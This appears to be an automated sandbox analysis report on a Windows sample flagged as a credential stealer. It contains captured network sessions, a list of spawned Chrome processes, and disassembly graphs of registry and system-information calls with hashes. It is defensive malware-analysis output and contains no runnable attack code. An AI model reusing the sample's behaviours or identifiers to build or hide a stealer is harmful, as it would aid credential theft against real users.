                                                                                                                                                                                                        2024-12-02 06:39:29 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        122192.168.2.84992813.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:30 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:30 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:30 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1391
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BDF58DC7E"
                                                                                                                                                                                                        x-ms-request-id: b06c69a3-d01e-008e-61b3-42387a000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063930Z-174f7845968jrjrxhC1EWRmmrs000000142g00000000e1rq
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:30 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        123192.168.2.84993013.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:30 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:30 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:30 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1403
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BDCDD6400"
                                                                                                                                                                                                        x-ms-request-id: 709e6de4-501e-00a3-7b5b-43c0f2000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063930Z-174f7845968xlwnmhC1EWR0sv800000013x0000000004zt0
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:30 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                        Start time:01:37:20
                                                                                                                                                                                                        Start date:02/12/2024
                                                                                                                                                                                                        Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                        Imagebase:0x680000
                                                                                                                                                                                                        File size:1'849'856 bytes
                                                                                                                                                                                                        MD5 hash:91042593292BABA6CE50F767911859E1
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1594408142.00000000011E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1624888871.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1541778568.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1594686688.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                        Start time:01:38:04
                                                                                                                                                                                                        Start date:02/12/2024
                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                        Imagebase:0x7ff678760000
                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                        Start time:01:38:05
                                                                                                                                                                                                        Start date:02/12/2024
                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=1828,i,11464838882767469421,13980832017172917232,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                        Imagebase:0x7ff678760000
                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                        Start time:01:38:09
                                                                                                                                                                                                        Start date:02/12/2024
                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                        Imagebase:0x7ff678760000
                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                        Start time:01:38:10
                                                                                                                                                                                                        Start date:02/12/2024
                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1988,i,12511401562534462833,16217488018526680522,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                        Imagebase:0x7ff678760000
                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                          Execution Coverage:0.5%
                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                          Signature Coverage:40%
                                                                                                                                                                                                          Total number of Nodes:10
                                                                                                                                                                                                          Total number of Limit Nodes:3
                                                                                                                                                                                                          execution_graph 2563 64fe29c 2567 64fbb49 2563->2567 2564 64ffe2f RegOpenKeyA 2565 64ffe56 RegOpenKeyA 2564->2565 2564->2567 2565->2567 2566 64ffeb7 GetNativeSystemInfo 2566->2567 2567->2564 2567->2565 2567->2566 2568 64fbd19 2567->2568 2569 69ff36 2570 6a0120 2569->2570 2571 69ff30 2569->2571 2571->2569 2571->2570 2573 6b71f0 LdrInitializeThunk 2571->2573 2573->2571

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 38 6b71f0-6b7222 LdrInitializeThunk
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LdrInitializeThunk.NTDLL(006A00D4,?,00000014,000000FF,?,?,?,?), ref: 006B721E
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1941459442.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1941135721.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1941459442.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1941713623.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1941739792.00000000006D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1941739792.0000000000857000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1941739792.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1941739792.000000000095B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1941739792.0000000000967000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1941739792.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1942716162.0000000000976000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1943385448.0000000000B13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1943429919.0000000000B14000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                          • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 39 69ff36-69ff41 40 6a000b-6a001f 39->40 41 6a00e8-6a00f4 39->41 42 6a0069 39->42 43 69ff61-69ff89 39->43 44 69ffa0-69ffb1 39->44 45 6a0120 39->45 46 6a0140-6a0148 39->46 47 6a0126-6a012a 39->47 48 69ffc6-69ffdb 39->48 49 6a00fb-6a010f 39->49 50 69ffb8-69ffbd 39->50 51 69ff90 39->51 52 69fff0-6a0004 39->52 53 69ff50-69ff5a 39->53 54 6a0150 39->54 55 6a0030-6a0062 39->55 56 6a0070-6a0081 39->56 57 6a0130-6a013a 39->57 58 6a0156-6a0165 39->58 40->42 40->45 40->46 40->47 40->53 40->54 40->55 40->56 40->57 40->58 41->40 41->42 41->44 41->45 41->46 41->47 41->48 41->49 41->50 41->51 41->52 41->53 41->54 41->55 41->56 41->57 41->58 42->56 43->40 43->42 43->44 43->45 43->46 43->47 43->48 43->50 43->51 43->52 43->53 43->54 43->55 43->56 43->57 43->58 44->40 44->42 44->45 44->46 44->47 44->48 44->50 44->52 44->53 44->54 44->55 44->56 44->57 44->58 46->45 46->46 46->47 46->54 46->57 46->58 47->57 48->42 48->45 48->46 48->47 48->52 48->53 48->54 48->55 48->56 48->57 48->58 49->45 49->46 49->47 49->54 49->57 49->58 50->48 51->44 52->40 52->42 52->45 52->46 52->47 52->53 52->54 52->55 52->56 52->57 52->58 53->40 53->41 53->42 53->43 53->44 53->45 53->46 53->47 53->48 53->49 53->50 53->51 53->52 53->53 53->54 53->55 53->56 53->57 53->58 55->42 55->45 55->46 55->47 55->54 55->56 55->57 55->58 56->53 60 6a0087-6a008f 56->60 57->46 58->39 58->40 58->41 58->42 58->43 58->44 58->45 58->46 58->47 58->48 58->49 58->50 58->51 58->52 58->53 58->54 58->55 58->56 58->57 58->58 59 69ff30 58->59 59->39 62 6a0090-6a0097 60->62 63 6a0099-6a009c 62->63 64 6a00a3-6a00aa 62->64 63->62 65 6a009e 63->65 64->53 66 6a00b0-6a00cf call 6b71f0 64->66 65->53 68 6a00d4-6a00e1 66->68 68->40 68->41 68->42 68->43 68->44 68->45 68->46 68->47 68->48 68->49 68->50 68->51 68->52 68->53 68->54 68->55 68->56 68->57 68->58
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1941459442.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1941135721.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1941459442.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1941713623.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1941739792.00000000006D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1941739792.0000000000857000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1941739792.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1941739792.000000000095B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1941739792.0000000000967000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1941739792.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1942716162.0000000000976000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1943385448.0000000000B13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1943429919.0000000000B14000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 28068875a422544a5a680311728a3890147a2636a2b99757c7c8cf55d2de1192
                                                                                                                                                                                                          • Instruction ID: d1c19d3c1a343b722bf1d53fdab2b6399c0a35ecee6eb59594a18fc863828f74
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 28068875a422544a5a680311728a3890147a2636a2b99757c7c8cf55d2de1192
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6851C471618202DFE708DF28DCA162A77E7FF89310F59867CE94A872B6D7319891CB10

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 0 64fe29c-64fe2a0 1 64ffded-64ffe2d 0->1 3 64ffe2f-64ffe4a RegOpenKeyA 1->3 4 64ffe56-64ffe71 RegOpenKeyA 1->4 3->4 5 64ffe4c 3->5 6 64ffe89-64ffeb5 4->6 7 64ffe73-64ffe7d 4->7 5->4 10 64ffeb7-64ffec0 GetNativeSystemInfo 6->10 11 64ffec2-64ffecc 6->11 7->6 10->11 12 64ffece 11->12 13 64ffed8-64ffee6 11->13 12->13 15 64ffee8 13->15 16 64ffef2-64ffef9 13->16 15->16 17 64ffeff-64fff06 16->17 18 64fff0c 16->18 17->18 19 65015e4-65015eb 17->19 20 6500440-65018b1 18->20 21 65015f1-65015fa 19->21 22 64fbb49-64ff5fa 19->22 28 65018b7-65018c7 20->28 29 64fe9f3-64fe9fa 20->29 22->1 30 64fbd1f-64fbd2c 28->30 31 64fbd19 29->31 32 64fea00-64fea06 29->32 33 64fbd3f 30->33 34 64fbd32-64fbd39 30->34 31->30 32->30 33->20 34->33 35 64fd973-65001ff 34->35
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 064FFE42
                                                                                                                                                                                                          • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 064FFE69
                                                                                                                                                                                                          • GetNativeSystemInfo.KERNEL32(?), ref: 064FFEC0
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1948030342.00000000064FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1947944973.0000000006360000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1947965079.0000000006362000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1948006174.0000000006366000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1948030342.000000000636A000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1948030342.000000000660E000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1948030342.000000000661C000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1948030342.000000000661E000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6360000_file.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Open$InfoNativeSystem
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1247124224-0
                                                                                                                                                                                                          • Opcode ID: a3edb483467d0f435c6e2062597ce9b117060f06e6bcaa6fc66197ccc61adaba
                                                                                                                                                                                                          • Instruction ID: 9b9c324d83113295b5119f4552035d92ed0afb88a9ff006fba73c95df9c8f954
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3edb483467d0f435c6e2062597ce9b117060f06e6bcaa6fc66197ccc61adaba
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC41687252410E9FEF51DF64C848BEF3BA8FF09311F000527EA4586A41E7724DA8DB5A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1948030342.00000000064FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1947944973.0000000006360000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1947965079.0000000006362000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1948006174.0000000006366000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1948030342.000000000636A000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1948030342.000000000660E000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1948030342.000000000661C000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1948030342.000000000661E000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6360000_file.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 2f76e3ba1179ef0cf6f07446db3073de788bd6b425a68dfc16d652c530c5a008
                                                                                                                                                                                                          • Instruction ID: 18963ebea90d5acfb83832a14f2de4cafcce2591fc8891b15b111983063d674d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f76e3ba1179ef0cf6f07446db3073de788bd6b425a68dfc16d652c530c5a008
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89415AB291C3109FE345BF29D8856AAFBE5FF58311F06492DE6C593610E7356880CB87
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1948030342.00000000064FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1947944973.0000000006360000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1947965079.0000000006362000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1948006174.0000000006366000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1948030342.000000000636A000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1948030342.000000000660E000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1948030342.000000000661C000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1948030342.000000000661E000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6360000_file.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: cb54076ece1179590c6b75b29584bb8012a2e2fb7668c6ed15868ce366af33a1
                                                                                                                                                                                                          • Instruction ID: b37176dfa0e89134a5efcc17b4d66791fbfc5284415cfe3aa30467ad0ef63a11
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb54076ece1179590c6b75b29584bb8012a2e2fb7668c6ed15868ce366af33a1
